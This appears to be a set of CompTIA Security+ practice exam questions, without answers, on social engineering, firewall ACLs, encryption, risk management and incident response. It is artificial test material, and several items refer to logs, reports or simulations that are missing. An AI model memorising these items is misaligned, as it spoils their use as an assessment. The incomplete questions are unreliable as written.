CAMPTIA QST (2)

The document presents a series of multiple-choice questions related to cybersecurity concepts, practices, and scenarios. Topics include threat actors, social engineering attacks, firewall configurations, data protection methods, and incident response strategies. Each question tests knowledge on specific security measures and principles relevant to protecting information systems.

Which of the following threat actors is the most likely to be hired by a foreign government to attack critical systems located in other countries?

• A. Hacktivist

• B. Whistleblower

• C. Organized crime

• D. Unskilled attacker

Which of the following is used to add extra complexity before using a one-way data transformation
algorithm?

• A. Key stretching

• B. Data masking

• C. Steganography

• D. Salting

An employee clicked a link in an email from a payment website that asked the employee to update contact
information. The employee entered the log-in information but received a “page not found” error message.
Which of the following types of social engineering attacks occurred?

• A. Brand impersonation

• B. Pretexting

• C. Typosquatting

• D. Phishing

An enterprise is trying to limit outbound DNS traffic originating from its internal network. Outbound DNS requests will only be allowed from one device with the IP address 10.50.10.25. Which of the following firewall ACLs will accomplish this goal?

• A. Access list outbound permit 0.0.0.0/0 0.0.0.0/0 port 53
Access list outbound deny 10.50.10.25/32 0.0.0.0/0 port 53

• B. Access list outbound permit 0.0.0.0/0 10.50.10.25/32 port 53
Access list outbound deny 0.0.0.0/0 0.0.0.0/0 port 53

• C. Access list outbound permit 0.0.0.0/0 0.0.0.0/0 port 53
Access list outbound deny 0.0.0.0/0 10.50.10.25/32 port 53

• D. Access list outbound permit 10.50.10.25/32 0.0.0.0/0 port 53
Access list outbound deny 0.0.0.0/0 0.0.0.0/0 port 53

The term "CIA triad" is used to describe the basic principles of information security.

• True

• False
A data administrator is configuring authentication for a SaaS application and would like to reduce the
number of credentials employees need to maintain. The company prefers to use domain credentials
to access new SaaS applications. Which of the following methods would allow this
functionality?

• A. SSO

• B. LEAP

• C. MFA

• D. PEAP

Which of the following scenarios describes a possible business email compromise attack?

• A. An employee receives a gift card request in an email that has an executive’s name in the
display field of the email.

• B. Employees who open an email attachment receive messages demanding payment in order to access files.

• C. A service desk employee receives an email from the HR director asking for log-in
credentials to a cloud administrator account.

• D. An employee receives an email with a link to a phishing site that is designed to look like the
company’s email portal.

A company prevented direct access from the database administrators’ workstations to the network
segment that contains database servers. Which of the following should a database administrator use
to access the database servers?

• A. Jump server

• B. RADIUS

• C. HSM

• D. Load balancer

An organization’s internet-facing website was compromised when an attacker exploited a buffer overflow. Which of the following should the organization deploy to best protect against similar attacks in the future?

• A. NGFW

• B. WAF

• C. TLS

• D. SD-WAN
An administrator notices that several users are logging in from suspicious IP addresses. After
speaking with the users, the administrator determines that the employees were not logging in from
those IP addresses and resets the affected users’ passwords. Which of the following should the
administrator implement to prevent this type of attack from succeeding in the future?

• A. Multifactor authentication

• B. Permissions assignment

• C. Access management

• D. Password complexity

An employee receives a text message that appears to have been sent by the payroll department and is
asking for credential verification. Which of the following social engineering techniques are being
attempted? (Choose two.)

• A. Typosquatting

• B. Phishing

• C. Impersonation

• D. Vishing

• E. Smishing

• F. Misinformation

Several employees received a fraudulent text message from someone claiming to be the Chief Executive
Officer (CEO). The message stated:
“I’m in an airport right now with no access to email. I need you to buy gift cards for employee recognition
awards. Please send the gift cards to following email address.”
Which of the following are the best responses to this situation? (Choose two.)

• A. Cancel current employee recognition gift cards.

• B. Add a smishing exercise to the annual company training.

• C. Issue a general email warning to the company.

• D. Have the CEO change phone numbers.

• E. Conduct a forensic investigation on the CEO’s phone.

• F. Implement mobile device management.

A company is required to use certified hardware when building networks. Which of the following best
addresses the risks associated with procuring counterfeit hardware?

• A. A thorough analysis of the supply chain

• B. A legally enforceable corporate acquisition policy

• C. A right to audit clause in vendor contracts and SOWs

• D. An in-depth penetration test of all suppliers and vendors


Which of the following provides the details about the terms of a test with a third-party penetration tester?

• A. Rules of engagement

• B. Supply chain analysis

• C. Right to audit clause

• D. Due diligence

A penetration tester begins an engagement by performing port and service scans against the client
environment according to the rules of engagement. Which of the following reconnaissance types is the
tester performing?

• A. Active

• B. Passive

• C. Defensive

• D. Offensive

Which of the following is required for an organization to properly manage its restore process in the event of
system failure?

• A. IRP

• B. DRP

• C. RPO

• D. SDLC

Which of the following vulnerabilities is associated with installing software outside of a manufacturer’s
approved software repository?

• A. Jailbreaking

• B. Memory injection

• C. Resource reuse

• D. Side loading

An analyst is evaluating the implementation of Zero Trust principles within the data plane. Which of the
following would be most relevant for the analyst to evaluate?

• A. Secured zones

• B. Subject role

• C. Adaptive identity

• D. Threat scope reduction


An engineer needs to find a solution that creates an added layer of security by preventing
unauthorized access to internal company resources. Which of the following would be the best
solution?

• A. RDP server

• B. Jump server

• C. Proxy server

• D. Hypervisor

A company’s web filter is configured to scan the URL for strings and deny access when matches are
found. Which of the following search strings should an analyst employ to prohibit access to non-
encrypted websites?

• A. encryption=off

• B. http://

• C. www.*.com

• D. :443

During a security incident, the security operations team identified sustained network traffic from a
malicious IP address: 10.1.4.9. A security analyst is creating an inbound firewall rule to block the IP
address from accessing the organization’s network. Which of the following fulfills this request?

• A. access-list inbound deny ip source 0.0.0.0/0 destination 10.1.4.9/32

• B. access-list inbound deny ip source 10.1.4.9/32 destination 0.0.0.0/0

• C. access-list inbound permit ip source 10.1.4.9/32 destination 0.0.0.0/0

• D. access-list inbound permit ip source 0.0.0.0/0 destination 10.1.4.9/32

A company needs to provide administrative access to internal resources while minimizing the traffic
allowed through the security boundary. Which of the following methods is most secure?

• A. Implementing a bastion host

• B. Deploying a perimeter network

• C. Installing a WAF

• D. Utilizing single sign-on

A security analyst is reviewing alerts in the SIEM related to potential malicious network traffic coming
from an employee’s corporate laptop. The security analyst has determined that additional data about
the executable running on the machine is necessary to continue the investigation.
Which of the following logs should the analyst use as a data source?

• A. Application

• B. IPS/IDS

• C. Network

• D. Endpoint
A cyber operations team informs a security analyst about a new tactic malicious actors are using to
compromise networks.
SIEM alerts have not yet been configured. Which of the following best describes what the security analyst
should do to identify this behavior?

• A. Digital forensics

• B. E-discovery

• C. Incident response

• D. Threat hunting

A company purchased cyber insurance to address items listed on the risk register. Which of the following
strategies does this represent?

• A. Accept

• B. Transfer

• C. Mitigate

• D. Avoid

A security administrator would like to protect data on employees’ laptops. Which of the following encryption
techniques should the security administrator use?

• A. Partition

• B. Asymmetric

• C. Full disk

• D. Database

Which of the following security control types does an acceptable use policy best represent?

• A. Detective

• B. Compensating

• C. Corrective

• D. Preventive

An IT manager informs the entire help desk staff that only the IT manager and the help desk lead will
have access to the administrator console of the help desk software. Which of the following security
techniques is the IT manager setting up?

• A. Hardening

• B. Employee monitoring

• C. Configuration enforcement

• D. Least privilege
Which of the following is the most likely to be used to document risks, responsible parties, and thresholds?

• A. Risk tolerance

• B. Risk transfer

• C. Risk register

• D. Risk analysis

Which of the following should a security administrator adhere to when setting up a new set of firewall
rules?

• A. Disaster recovery plan

• B. Incident response procedure

• C. Business continuity plan

• D. Change management procedure

A company is expanding its threat surface program and allowing individuals to security test the company’s
internet-facing application. The company will compensate researchers based on the vulnerabilities
discovered. Which of the following best describes the program the company is
setting up?

• A. Open-source intelligence

• B. Bug bounty

• C. Red team

• D. Penetration testing

Which of the following threat actors is the most likely to use large financial resources to attack critical
systems located in other countries?

• A. Insider

• B. Unskilled attacker

• C. Nation-state

• D. Hacktivist

Which of the following enables the use of an input field to run commands that can view or manipulate
data?

• A. Cross-site scripting

• B. Side loading

• C. Buffer overflow

• D. SQL injection
Employees in the research and development business unit receive extensive training to ensure they
understand how to best protect company data. Which of the following is the type of data these
employees are most likely to use in day-to-day work activities?

• A. Encrypted

• B. Intellectual property

• C. Critical

• D. Data in transit

A company has begun labeling all laptops with asset inventory stickers and associating them with
employee IDs. Which of the following security benefits do these actions provide? (Choose two.)

• A. If a security incident occurs on the device, the correct employee can be notified.

• B. The security team will be able to send user awareness training to the appropriate device.

• C. Users can be mapped to their devices when configuring software MFA tokens.

• D. User-based firewall policies can be correctly targeted to the appropriate laptops.

• E. When conducting penetration testing, the security team will be able to target the desired
laptops.

• F. Company data can be accounted for when the employee leaves the organization.

A technician wants to improve the situational and environmental awareness of existing users as they
transition from remote to in-office work. Which of the following is the best option?

• A. Send out periodic security reminders.

• B. Update the content of new hire documentation.

• C. Modify the content of recurring training.

• D. Implement a phishing campaign.

A newly appointed board member with cybersecurity knowledge wants the board of directors to receive a
quarterly report detailing the number of incidents that impacted the organization. The systems administrator
is creating a way to present the data to the board of directors. Which of the following should the systems
administrator use?

• A. Packet captures

• B. Vulnerability scans

• C. Metadata

• D. Dashboard

A systems administrator receives the following alert from a file integrity monitoring tool: The hash
of the cmd.exe file has changed.
The systems administrator checks the OS logs and notices that no patches were applied in the last
two months. Which of the following most likely occurred?
• A. The end user changed the file permissions.

• B. A cryptographic collision was detected.

• C. A snapshot of the file system was taken.

• D. A rootkit was deployed.

Which of the following roles, according to the shared responsibility model, is responsible for securing
the company’s database in an IaaS model for a cloud environment?

• A. Client

• B. Third-party vendor

• C. Cloud provider

• D. DBA

A client asked a security company to provide a document outlining the project, the cost, and the
completion time frame. Which of the following documents should the company provide to the client?

• A. MSA

• B. SLA

• C. BPA

• D. SOW

A security team is reviewing the findings in a report that was delivered after a third party performed a
penetration test. One of the findings indicated that a web application form field is
vulnerable to cross-site scripting. Which of the following application security techniques should the
security analyst recommend the developer implement to prevent this vulnerability?

• A. Secure cookies

• B. Version control

• C. Input validation

• D. Code signing

Which of the following must be considered when designing a high-availability network? (Choose two.)

• A. Ease of recovery

• B. Ability to patch

• C. Physical isolation

• D. Responsiveness

• E. Attack surface

• F. Extensible authentication
A technician needs to apply a high-priority patch to a production system. Which of the following steps
should be taken first?

• A. Air gap the system.

• B. Move the system to a different network segment.

• C. Create a change control request.

• D. Apply the patch to the system.

Which of the following describes the reason root cause analysis should be conducted as part of incident
response?

• A. To gather IoCs for the investigation

• B. To discover which systems have been affected

• C. To eradicate any trace of malware on the network

• D. To prevent future incidents of the same nature

Which of the following is the most likely outcome if a large bank fails an internal PCI DSS compliance
assessment?

• A. Fines

• B. Audit findings

• C. Sanctions

• D. Reputation damage

A company is developing a business continuity strategy and needs to determine how many staff members
would be required to sustain the business in the case of a disruption. Which of the following best
describes this step?

• A. Capacity planning

• B. Redundancy

• C. Geographic dispersion

• D. Tabletop exercise

A company’s legal department drafted sensitive documents in a SaaS application and wants to ensure
the documents cannot be accessed by individuals in high-risk countries. Which of the following is
the most effective way to limit this access?

• A. Data masking

• B. Encryption

• C. Geolocation policy

• D. Data sovereignty regulation

Which of the following is a hardware-specific vulnerability?


• A. Firmware version

• B. Buffer overflow

• C. SQL injection

• D. Cross-site scripting

While troubleshooting a firewall configuration, a technician determines that a “deny any” policy should be added to the bottom of the ACL. The technician updates the policy, but the new policy causes several company servers to become unreachable.
Which of the following actions would prevent this issue?

• A. Documenting the new policy in a change request and submitting the request to change
management

• B. Testing the policy in a non-production environment before enabling the policy in the
production network

• C. Disabling any intrusion prevention signatures on the “deny any” policy prior to enabling the new policy

• D. Including an “allow any” policy above the “deny any” policy

An organization is building a new backup data center with cost-benefit as the primary requirement and
RTO and RPO values around two days. Which of the following types of sites is the best for this scenario?

• A. Real-time recovery

• B. Hot

• C. Cold

• D. Warm

A company requires hard drives to be securely wiped before sending decommissioned systems to
recycling. Which of the following best describes this policy?

• A. Enumeration

• B. Sanitization

• C. Destruction

• D. Inventory

A systems administrator works for a local hospital and needs to ensure patient data is protected and
secure. Which of the following data classifications should be used to secure patient data?

• A. Private

• B. Critical

• C. Sensitive

• D. Public
A U.S.-based cloud-hosting provider wants to expand its data centers to new international locations.
Which of the following should the hosting provider consider first?

• A. Local data protection regulations

• B. Risks from hackers residing in other countries

• C. Impacts to existing contractual obligations

• D. Time zone differences in log correlation

Which of the following would be the best way to block unknown programs from executing?

• A. Access control list

• B. Application allow list

• C. Host-based firewall

• D. DLP solution

A company hired a consultant to perform an offensive security assessment covering penetration testing
and social engineering.
Which of the following teams will conduct this assessment activity?

• A. White

• B. Purple

• C. Blue

• D. Red

A software development manager wants to ensure the authenticity of the code created by the company.
Which of the following options is the most appropriate?

• A. Testing input validation on the user input fields

• B. Performing code signing on company-developed software

• C. Performing static code analysis on the software

• D. Ensuring secure cookies are used

Which of the following can be used to identify potential attacker activities without affecting production
servers?

• A. Honeypot

• B. Video surveillance

• C. Zero Trust

• D. Geofencing

During an investigation, an incident response team attempts to understand the source of an incident.
Which of the following incident response activities describes this process?

• A. Analysis
• B. Lessons learned

• C. Detection

• D. Containment

A security practitioner completes a vulnerability assessment on a company’s network and finds several vulnerabilities, which the operations team remediates. Which of the following should be done next?

• A. Conduct an audit.

• B. Initiate a penetration test.

• C. Rescan the network.

• D. Submit a report.

An administrator was notified that a user logged in remotely after hours and copied large amounts of
data to a personal device.
Which of the following best describes the user’s activity?

• A. Penetration testing

• B. Phishing campaign

• C. External audit

• D. Insider threat

Which of the following allows for the attribution of messages to individuals?

• A. Adaptive identity

• B. Non-repudiation

• C. Authentication

• D. Access logs

Which of the following is the best way to consistently determine on a daily basis whether security settings on
servers have been modified?

• A. Automation

• B. Compliance checklist

• C. Attestation

• D. Manual audit

Which of the following tools can assist with detecting an employee who has accidentally emailed a file
containing a customer’s PII?

• A. SCAP

• B. NetFlow

• C. Antivirus
• D. DLP

An organization recently updated its security policy to include the following statement:
Regular expressions are included in source code to remove special characters such as $, |, ;. C, `, and ?
from variables set by forms in a web application.
Which of the following best explains the security technique the organization adopted by making this
addition to the policy?

• A. Identify embedded keys

• B. Code debugging

• C. Input validation

• D. Static code analysis

A security analyst and the management team are reviewing the organizational performance of a
recent phishing campaign. The user click-through rate exceeded the acceptable risk threshold, and
the management team wants to reduce the impact when a user clicks on a link in a phishing
message. Which of the following should the analyst do?

• A. Place posters around the office to raise awareness of common phishing activities.

• B. Implement email security filters to prevent phishing emails from being delivered.

• C. Update the EDR policies to block automatic execution of downloaded programs.

• D. Create additional training for users to recognize the signs of phishing attempts.

Which of the following has been implemented when a host-based firewall on a legacy Linux system
allows connections from only specific internal IP addresses?

• A. Compensating control

• B. Network segmentation

• C. Transfer of risk

• D. SNMP traps

The management team notices that new accounts that are set up manually do not always have correct
access or permissions.
Which of the following automation techniques should a systems administrator use to streamline account
creation?

• A. Guard rail script

• B. Ticketing workflow

• C. Escalation script

• D. User provisioning script


A company is planning to set up a SIEM system and assign an analyst to review the logs on a weekly
basis. Which of the following types of controls is the company setting up?

• A. Corrective

• B. Preventive

• C. Detective

• D. Deterrent

A systems administrator is looking for a low-cost application-hosting solution that is cloud-based. Which of the following meets these requirements?

• A. Serverless framework

• B. Type 1 hypervisor

• C. SD-WAN

• D. SDN

A security operations center determines that the malicious activity detected on a server is normal. Which of
the following activities describes the act of ignoring detected activity in the future?

• A. Tuning

• B. Aggregating

• C. Quarantining

• D. Archiving

A security analyst reviews domain activity logs and notices the following:

Which of the following is the best explanation for what the security analyst has discovered?

• A. The user jsmith’s account has been locked out.

• B. A keylogger is installed on jsmith’s workstation.

• C. An attacker is attempting to brute force jsmith’s account.

• D. Ransomware has been deployed in the domain.

A company is concerned about weather events causing damage to the server room and downtime.
Which of the following should the company consider?

• A. Clustering servers

• B. Geographic dispersion

• C. Load balancers
• D. Off-site backups

Which of the following is a primary security concern for a company setting up a BYOD program?

• A. End of life

• B. Buffer overflow

• C. VM escape

• D. Jailbreaking

A company decided to reduce the cost of its annual cyber insurance policy by removing the coverage
for ransomware attacks.
Which of the following analysis elements did the company most likely use in making this decision?

• A. MTTR

• B. RTO

• C. ARO

• D. MTBF

Which of the following is the most likely to be included as an element of communication in a security
awareness program?

• A. Reporting phishing attempts or other suspicious activities

• B. Detecting insider threats using anomalous behavior recognition

• C. Verifying information when modifying wire transfer data

• D. Performing social engineering as part of third-party penetration testing

Which access control model allows for defining granular rules that consider user roles, time constraints,
and network access restrictions?

• ABAC

• MAC

• RuBAC

• DAC

• RBAC

Which type of control access model connects user permissions to their specific responsibilities?

• DAC

• RBAC

• MAC

• ABAC
HOTSPOT -
Select the appropriate attack and remediation from each drop-down list to label the corresponding
attack with its remediation.

INSTRUCTIONS -
Not all attacks and remediation actions will be used.
If at any time you would like to bring back the initial state of the simulation, please click the Reset All
button.
HOTSPOT -
You are a security administrator investigating a potential infection on a network.

INSTRUCTIONS -
Click on each host and firewall. Review all logs to determine which host originated the infection and
then identify if each remaining host is clean or infected.
If at any time you would like to bring back the initial state of the simulation, please click the Reset All button.
Which of the following is the phase in the incident response process when a security analyst
reviews roles and responsibilities?

• A. Preparation

• B. Recovery

• C. Lessons learned

• D. Analysis

After a recent vulnerability scan, a security engineer needs to harden the routers within the corporate
network. Which of the following is the most appropriate to disable?

• A. Console access

• B. Routing protocols

• C. VLANs

• D. Web-based administration
A security administrator needs a method to secure data in an environment that includes some form of checks to track any changes. Which of the following should the administrator set up to achieve this goal?

• A. SPF

• B. GPO

• C. NAC

• D. FIM

An administrator is reviewing a single server's security logs and discovers the following:

Which of the following best describes the action captured in this log file?

• A. Brute-force attack

• B. Privilege escalation

• C. Failed password audit

• D. Forgotten password by the user


A security engineer is implementing FDE for all laptops in an organization. Which of the following are the
most important for the engineer to consider as part of the planning process? (Choose two.)

• A. Key escrow

• B. TPM presence

• C. Digital signatures

• D. Data tokenization

• E. Public key management

• F. Certificate authority linking

A security analyst scans a company's public network and discovers a host is running a remote
desktop that can be used to access the production network. Which of the following changes should
the security analyst recommend?

• A. Changing the remote desktop port to a non-standard number

• B. Setting up a VPN and placing the jump server inside the firewall

• C. Using a proxy for web connections from the remote desktop server

• D. Connecting the remote server to the domain and increasing the password length

An enterprise has been experiencing attacks focused on exploiting vulnerabilities in older browser
versions with well-known exploits. Which of the following security solutions should be configured to
best provide the ability to monitor and block these known signature-based attacks?

• A. ACL

• B. DLP

• C. IDS

• D. IPS

Security controls in a data center are being reviewed to ensure data is properly protected and that human life
considerations are included. Which of the following best describes how the controls should be set up?

• A. Remote access points should fail closed.

• B. Logging controls should fail open.

• C. Safety controls should fail open.

• D. Logical security controls should fail closed.

Which of the following would be best suited for constantly changing environments?

• A. RTOS

• B. Containers
• C. Embedded systems

• D. SCADA

Which of the following incident response activities ensures evidence is properly handled?

• A. E-discovery

• B. Chain of custody

• C. Legal hold

• D. Preservation

An accounting clerk sent money to an attacker's bank account after receiving fraudulent
instructions to use a new account. Which of the following would most likely prevent this activity in the
future?

• A. Standardizing security incident reporting

• B. Executing regular phishing campaigns

• C. Implementing insider threat detection measures

• D. Updating processes for sending wire transfers

A systems administrator is creating a script that would save time and prevent human error when
performing account creation for a large number of end users. Which of the following would be a good
use case for this task?

• A. Off-the-shelf software

• B. Orchestration

• C. Baseline

• D. Policy enforcement

A company's marketing department collects, modifies, and stores sensitive customer data. The
infrastructure team is responsible for securing the data while in transit and at rest. Which of the
following data roles describes the customer?

• A. Processor

• B. Custodian

• C. Subject

• D. Owner

Which of the following describes the maximum allowance of accepted risk?

• A. Risk indicator

• B. Risk level

• C. Risk score

• D. Risk threshold
A security analyst receives alerts about an internal system sending a large amount of unusual DNS
queries to systems on the internet over short periods of time during non-business hours. Which of
the following is most likely occurring?

• A. A worm is propagating across the network.

• B. Data is being exfiltrated.

• C. A logic bomb is deleting data.

• D. Ransomware is encrypting files.

A technician is opening ports on a firewall for a new system being deployed and supported by a SaaS
provider. Which of the following is a risk in the new system?

• A. Default credentials

• B. Non-segmented network

• C. Supply chain vendor

• D. Vulnerable software

A systems administrator is working on a solution with the following requirements:

• Provide a secure zone.
• Enforce a company-wide access control policy.
• Reduce the scope of threats.

Which of the following is the systems administrator setting up?

• A. Zero Trust

• B. AAA

• C. Non-repudiation

• D. CIA

Which of the following involves an attempt to take advantage of database misconfigurations?

• A. Buffer overflow

• B. SQL injection

• C. VM escape

• D. Memory injection

Which of the following is used to validate a certificate when it is presented to a user?

• A. OCSP

• B. CSR

• C. CA

• D. CRC
Which of the following acronyms refers to any type of information pertaining to an individual that can be
used to uniquely identify that person?

• PHI

• PIV

• PII

• PKI

An authentication subsystem that enables a user to access multiple, connected system components (such as separate hosts on a network) after a single login on only one of the components is referred to as:

• NAC

• SSO

• AAA

• MFA

Which of the cryptographic algorithms listed below is the least vulnerable to attacks?

• AES

• DES

• RC4

• 3DES

Which of the following answers illustrates the difference between passive and active network
security breach response?

• HIPS vs. NIPS

• UTM vs. Firewall

• NIPS vs. UTM

• IDS vs. IPS

An SELinux kernel security feature for implementing stricter access controls and policies is known as:

• DAC

• RBAC

• MAC

• ABAC

Which wireless security protocol has been deprecated in favor of newer standards due to known
vulnerabilities resulting from implementation flaws?

• EAP

• AES

• WPA2

• WEP

One of a company's vendors sent an analyst a security bulletin that recommends a BIOS update.
Which of the following vulnerability types is being addressed by the patch?

• A. Virtualization

• B. Firmware

• C. Application

• D. Operating system

Which of the following is used to quantitatively measure the criticality of a vulnerability?

• A. CVE

• B. CVSS

• C. CIA

• D. CERT

Which of the following actions could a security engineer take to ensure workstations and servers are
properly monitored for unauthorized changes and software?

• A. Configure all systems to log scheduled tasks.

• B. Collect and monitor all traffic exiting the network.

• C. Block traffic based on known malicious signatures.

• D. Install endpoint management software on all systems

An organization is leveraging a VPN between its headquarters and a branch location. Which of the following
is the VPN protecting?

• A. Data in use

• B. Data in transit

• C. Geographic restrictions

• D. Data sovereignty

The US Health Insurance Portability and Accountability Act (HIPAA) provides privacy protection for:
(Select best answer)

• PII

• ESN

• PHI

• PIV

Which of the answers listed below refers to a hierarchical system for the creation, management, storage,
distribution, and revocation of digital certificates?

• PKI

• RA

• PKCS

• CA

After reviewing the following vulnerability scanning report:

A security analyst performs the following test:

Which of the following would the security analyst conclude for this reported vulnerability?

• A. It is a false positive.

• B. A rescan is required.

• C. It is considered noise.

• D. Compensating controls exist.

An organization disabled unneeded services and placed a firewall in front of a business-critical legacy
system. Which of the following best describes the actions taken by the organization?

• A. Exception

• B. Segmentation

• C. Risk transfer

• D. Compensating controls

A security consultant needs secure, remote access to a client environment. Which of the following
should the security consultant most likely use to gain access?

• A. EAP

• B. DHCP

• C. IPSec

• D. NAT

Which of the following should a systems administrator use to ensure an easy deployment of
resources within the cloud provider?

• A. Software as a service

• B. Infrastructure as code

• C. Internet of Things

• D. Software-defined networking

After a security awareness training session, a user called the IT help desk and reported a
suspicious call. The suspicious caller stated that the Chief Financial Officer wanted credit card
information in order to close an invoice. Which of the following topics did the user recognize from the
training?

• A. Insider threat

• B. Email phishing

• C. Social engineering

• D. Executive whaling

A security administrator is deploying a DLP solution to prevent the exfiltration of sensitive customer
data. Which of the following should the administrator do first?

• A. Block access to cloud storage websites.

• B. Create a rule to block outgoing email attachments.

• C. Apply classifications to the data.

• D. Remove all user permissions from shares on the file server.

An administrator assists the legal and compliance team with ensuring information about customer
transactions is archived for the proper time period. Which of the following data policies is the
administrator carrying out?

• A. Compromise

• B. Retention

• C. Analysis

• D. Transfer

• E. Inventory

A company is working with a vendor to perform a penetration test. Which of the following includes an
estimate about the number of hours required to complete the engagement?

• A. SOW

• B. BPA

• C. SLA

• D. NDA

A Chief Information Security Officer (CISO) wants to explicitly raise awareness about the increase of
ransomware-as-a-service in a report to the management team. Which of the following best describes
the threat actor in the CISO’s report?

• A. Insider threat

• B. Hacktivist

• C. Nation-state

• D. Organized crime

Which of the following practices would be best to prevent an insider from introducing malicious code
into a company's development process?

• A. Code scanning for vulnerabilities

• B. Open-source component usage

• C. Quality assurance testing

• D. Peer review and approval

Which of the following can best protect against an employee inadvertently installing malware on a company
system?

• A. Host-based firewall

• B. System isolation

• C. Least privilege

• D. Application allow list

A company is adding a clause to its AUP that states employees are not allowed to modify the
operating system on mobile devices. Which of the following vulnerabilities is the organization
addressing?

• A. Cross-site scripting

• B. Buffer overflow

• C. Jailbreaking

• D. Side loading

Which of the following would be the best ways to ensure only authorized personnel can access a
secure facility? (Choose two.)

• A. Fencing

• B. Video surveillance

• C. Badge access

• D. Access control vestibule

• E. Sign-in sheet

• F. Sensor

What is the name of a network protocol that secures web traffic via SSL/TLS encryption?

• SFTP

• HTTPS

• FTPS

• SHTTP

The purpose of PCI DSS is to provide protection for:

• Credit cardholder data

• Licensed software

• User passwords

• Personal health information

Which term describes the predicted loss of value to an asset based on a single security incident?

• SLE

• ARO

• ALE

• SLA

Which of the following acronyms refers to software that provides the functionality of a physical computer?

• SDN

• SaaS

• VM

• SoC

What is the common term for a group of protocols used to carry voice data over a packet-switched
network?

• ISDN

• PBX

• VoIP

• PSTN

Which of the terms listed below refers to a formal contract between business partners outlining the
rights, responsibilities, and obligations of each partner regarding the management, operation, and
decision-making processes within the business?

• MSA

• SLA

• BPA

• MOA

Which of the following file transfer protocols does not provide encryption?

• SCP

• FTPS

• FTP

• SFTP

An organization would like to store customer data on a separate part of the network that is not accessible to
users on the main corporate network. Which of the following should the
administrator use to accomplish this goal?

• A. Segmentation

• B. Isolation

• C. Patching

• D. Encryption

Which of the following is the most common data loss path for an air-gapped network?

• A. Bastion host

• B. Unsecured Bluetooth

• C. Unpatched OS

• D. Removable devices

Malware spread across a company's network after an employee visited a compromised industry blog.
Which of the following best describes this type of attack?

• A. Impersonation

• B. Disinformation

• C. Watering-hole

• D. Smishing

An organization is struggling with scaling issues on its VPN concentrator and internet circuit due to
remote work. The organization is looking for a software solution that will allow it to reduce
traffic on the VPN and internet circuit, while still providing encrypted tunnel access to the data center and
monitoring of remote employee internet traffic. Which of the following will help
achieve these objectives?

• A. Deploying a SASE solution to remote employees

• B. Building a load-balanced VPN solution with redundant internet

• C. Purchasing a low-cost SD-WAN solution for VPN traffic

• D. Using a cloud provider to create additional VPN concentrators

Which of the following is the best reason to complete an audit in a banking environment?

• A. Regulatory requirement

• B. Organizational change

• C. Self-assessment requirement

• D. Service-level requirement

Which of the following security concepts is the best reason for permissions on a human resources
fileshare to follow the principle of least privilege?

• A. Integrity

• B. Availability

• C. Confidentiality

• D. Non-repudiation

Which of the following are cases in which an engineer should recommend the decommissioning of a
network device? (Choose two.)

• A. The device has been moved from a production environment to a test environment.

• B. The device is configured to use cleartext passwords.

• C. The device is moved to an isolated segment on the enterprise network.

• D. The device is moved to a different location in the enterprise.

• E. The device's encryption level cannot meet organizational standards.

• F. The device is unable to receive authorized updates.

A company is required to perform a risk assessment on an annual basis. Which of the following types
of risk assessments does this requirement describe?

• A. Continuous

• B. Ad hoc

• C. Recurring

• D. One time

After a recent ransomware attack on a company's system, an administrator reviewed the log files. Which of
the following control types did the administrator use?

• A. Compensating

• B. Detective

• C. Preventive

• D. Corrective

Which of the following exercises should an organization use to improve its incident response process?

• A. Tabletop

• B. Replication

• C. Failover

• D. Recovery

Which of the following best ensures minimal downtime and data loss for organizations with critical
computing equipment located in earthquake-prone areas?

• A. Generators and UPS

• B. Off-site replication

• C. Redundant cold sites

• D. High availability networking

A newly identified network access vulnerability has been found in the OS of legacy IoT devices. Which of
the following would best mitigate this vulnerability quickly?

• A. Insurance

• B. Patching

• C. Segmentation

• D. Replacement

After an audit, an administrator discovers all users have access to confidential data on a file
server. Which of the following should the administrator use to restrict access to the data quickly?

• A. Group Policy

• B. Content filtering

• C. Data loss prevention

• D. Access control lists

A WAP is a specific type of AP that is used to create WLANs.

• True

• False

Which of the answers listed below refers to a language used for creating and organizing the content of
web pages?

• HTML

• CSS

• JS

• HTTP

Which network protocol enables retrieving contents of an Internet page from a web server?

• SNMP

• HTTP

• SMTP

• IMAP

A client demands at least 99.99% uptime from a service provider's hosted security services.
Which of the following documents includes the information the service provider should return to the
client?

• A. MOA

• B. SOW

• C. MOU

• D. SLA

A company is discarding a classified storage array and hires an outside vendor to complete the disposal.
Which of the following should the company request from the vendor?

• A. Certification

• B. Inventory list

• C. Classification

• D. Proof of ownership

A company is planning a disaster recovery site and needs to ensure that a single natural disaster would not
result in the complete loss of regulated backup data. Which of the following should the company consider?

• A. Geographic dispersion

• B. Platform diversity

• C. Hot site

• D. Load balancing

A security analyst locates a potentially malicious video file on a server and needs to identify both the
creation date and the file's creator. Which of the following actions would most likely give the security
analyst the information required?

• A. Obtain the file's SHA-256 hash.

• B. Use hexdump on the file's contents.

• C. Check endpoint logs.

• D. Query the file's metadata.

A type of user identification mechanism used as a countermeasure against automated software
(such as network bots) is known as:

• MFA

• CAPTCHA

• ACL

• NIPS

Which of the following is the recommended replacement for DES?

• DSA

• RSA

• RC4

• AES

Which of the terms listed below refers to the process of creating and maintaining computer applications?

• RAD

• SDLC

• OOP

• SaaS

A type of firmware interface designed as a replacement for BIOS is called:

• UEFI

• GPT

• ACPI

• PXE

Which of the following answers refers to a network security solution providing a single point of protection
against various types of threats?

• IDP

• AV

• UTM

• NGFW

A type of document stipulating rules of behavior to be followed by users of computers, networks, and
associated resources is called:

• SLA

• EULA

• AUP

• BPA

LDAP is an example of:

• Data encryption protocol

• Address resolution protocol

• Directory access protocol

• File exchange protocol

Which of the answers listed below refers to a suite of protocols used for connecting hosts on the
Internet?

• NetBIOS

• IPv4

• TCP/IP

• IPv6

The SMTP protocol is used for: (Select 2 answers)

• Sending email messages between mail servers

• Name resolution services

• Serving of web pages

• Retrieving email messages from mail servers

• Sending email messages from a client device

Which of the following answers refers to a data storage device equipped with hardware-level
encryption functionality?

• HSM

• TPM

• EFS

• SED

A documented plan outlining the steps that should be taken in each phase of a cybersecurity incident
is referred to as:

• DRP

• BCP

• IRP

• ERP

Which of the terms listed below refers to a company that provides Internet access?

• ISP

• CSP

• IdP

• MSP

As opposed to simple DoS attacks that usually are performed from a single system, a DDoS attack
uses multiple compromised computer systems to perform the attack against its target. The
intermediary systems that are used as a platform for the attack (often referred to as zombies, and
collectively as a botnet) are the secondary victims of the DDoS attack.

• True

• False

A type of cryptographic network protocol for secure data communication, remote command-line
login, remote command execution, and other secure network services between two networked
computers is known as:

• RDP

• SSH

• Telnet

• SCP

Which of the following answers can be used to describe technical security controls? (Select 3
answers)

• Focused on protecting material assets

• Sometimes called logical security controls

• Executed by computer systems (instead of people)

